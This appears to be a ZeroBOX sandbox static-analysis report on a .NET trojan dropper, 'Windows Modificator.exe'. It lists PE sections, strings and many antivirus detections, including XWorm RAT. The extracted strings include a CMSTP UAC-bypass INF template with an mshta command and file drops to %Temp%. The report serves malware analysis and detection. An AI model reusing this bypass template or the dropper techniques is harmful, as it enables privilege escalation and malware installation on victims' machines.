popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2024-07-17 03:35:42

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00006e24 0x00007000 7.19779574748
.rsrc 0x0000a000 0x0000805c 0x00008200 4.36429802945
.reloc 0x00014000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00011700 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00011b68 0x00000092 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x00011bfc 0x00000274 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00011e70 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
]]U]]]]]
Ze]"$=V
>`v3aH
Q6ig%C
uaj_@Vx*
[agG9Z%
aN<pEs
2}Jsi,
|PT\0;
8oNgVLy2l
kAy9%G
6y7387B
G,/y/?
A^"@w_
XX(=bg
8]b{8:
]R{7}T
>3k>l>n
6t9]MCt
;A"v7}
L~$5Fk
f|FFjl
(>5x 3
<-xkE&
1u$32>R
k=&s/x0
MHGx$+6
+_~g|8
"'&'[9
V\rdd8
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Program
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
CreateMutex
Decompress
GetTheResource
PostMessageW
wParam
lParam
FindWindowEx
parentHandle
childAfter
lclassName
windowTitle
user32
BinaryPath
SetInfFile
CommandToExecute
Execute
AdminCheck
System.Collections.Generic
List`1
System.Threading
_appMutex
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
Interaction
Environ
String
Concat
IEnumerable`1
Microsoft.Win32
RegistryKey
Exception
Thread
Environment
get_ExitCode
ServerComputer
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
get_CurrentUser
OpenSubKey
GetValue
Operators
ConditionalCompareObjectEqual
SetValue
ProjectData
SetProjectError
ClearProjectError
Enumerator
GetEnumerator
get_Current
Conversions
Strings
CompareMethod
ConcatenateObject
System.IO
Directory
Exists
DirectoryInfo
CreateDirectory
Convert
ToBoolean
WriteAllBytes
FileAttributes
SetAttributes
Process
Collect
MoveNext
IDisposable
Dispose
Replace
System.Windows.Forms
MessageBox
DialogResult
MessageBoxButtons
MessageBoxIcon
MemoryStream
Boolean
NewLateBinding
LateCall
ChangeType
BitConverter
ToInt32
Stream
System.IO.Compression
GZipStream
CompressionMode
SubtractObject
ToInteger
System.Reflection
Assembly
System.Resources
ResourceManager
GetExecutingAssembly
GetObject
Contains
AppDomain
get_CurrentDomain
get_BaseDirectory
ExpandEnvironmentVariables
System.Text
StringBuilder
GetRandomFileName
ToChar
Append
WriteAllText
ProcessStartInfo
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
IntPtr
op_Explicit
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
GetFileName
GetTempPath
set_FileName
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
STAThreadAttribute
DllImportAttribute
user32.dll
MarshalAsAttribute
UnmanagedType
ikiosfbywomf.Resources
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
Windows Modificator
Windows Modificator.exe
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
WrapNonExceptionThrows
$753cbffa-01fb-4183-82de-f50f29a4bf0e
1.0.0.0
_CorExeMain
mscoree.dll
wwwwwwwwwwwwwwwwwwwww
Se%ae`
cCBR_p
RRRRP%
CCCC@40`P@
cG?CCRRRRP`R
4qaCCRCCCB
pqacG%%apppppppaB
prRRRPa
wwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwww
se%%%%% R
u%6RRRRRPp
wwwwwwwwwwwwwww
wwwwwwwwp
wwwwwwww
!

((((&&(&&&(&(&&&&&&(((#&&###
*)))))))))))))))))))))
eIDATx
""""""""""""""""""""""""""""""""""""""""
'Px0&D
XXX8Pvh8v
],//cuu
n<DSbb
!KD4)#
NDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
WindowsModificator.exe
fakecmd.bat
WinDir
\system32\cmstp.exe
WindowsModificator.exe|True|False|False|%Temp%|False|False|False
fakecmd.bat|True|False|False|%Temp%|False|False|False
PZ9MfxjDP8QL1vpTW
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ShowSuperHidden
windows_health_service.warning
\vbNewLine
Windows
ikiosfbywomf
%Current%
REPLACE_COMMAND_LINE
"CorpVPN"
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
###REPLACE_COMMAND_LINE###
mshta vbscript:Execute(###CreateObject(####WScript.Shell####).Run ####taskkill /IM cmstp.exe /F####, 0, true:close###)
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
##HKLM##, ##SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE##, ##ProfileInstallPath##, ##%UnexpectedError%##, ####
[Strings]
ServiceName=##CorpVPN##
ShortSvcName=##CorpVPN##
@echo off
timeout 3 > NUL
" /f /q
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
Windows Modificator.exe
LegalCopyright
OriginalFilename
Windows Modificator.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
tehtris Clean
ClamAV Win.Packed.Msilmamut-10007182-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac IL:Trojan.MSILZilla.19217
Cylance Unsafe
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
Cybereason malicious.8d5d47
Baidu Clean
VirIT Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDropper.Agent.FOV
APEX Malicious
Avast Win32:InjectorX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender IL:Trojan.MSILZilla.19217
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan IL:Trojan.MSILZilla.19217
Tencent Win32.Trojan.Generic.Zmhl
Sophos Troj/Mdrop-JVT
F-Secure Trojan.TR/ATRAPS.Gen
DrWeb Trojan.MulDropNET.65
VIPRE IL:Trojan.MSILZilla.19217
TrendMicro Clean
McAfeeD Real Protect-LS!E2E17EA8D5D4
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.e2e17ea8d5d471e5
Emsisoft IL:Trojan.MSILZilla.19217 (B)
Paloalto Clean
GData IL:Trojan.MSILZilla.19217
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Agent.BUD.gen!Eldorado
Avira TR/ATRAPS.Gen
MAX malware (ai score=84)
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Clean
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D4B11
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Trojan:MSIL/XWormRAT.A!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5052738
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Malwarebytes Trojan.Dropper.MSIL.Generic
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
Ikarus Trojan.MSIL.Injector
MaxSecure Clean
Fortinet MSIL/Agent.FOV!tr
BitDefenderTheta Gen:NN.ZemsilF.36808.dm0@am1OZDi
AVG Win32:InjectorX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Clean
No IRMA results available.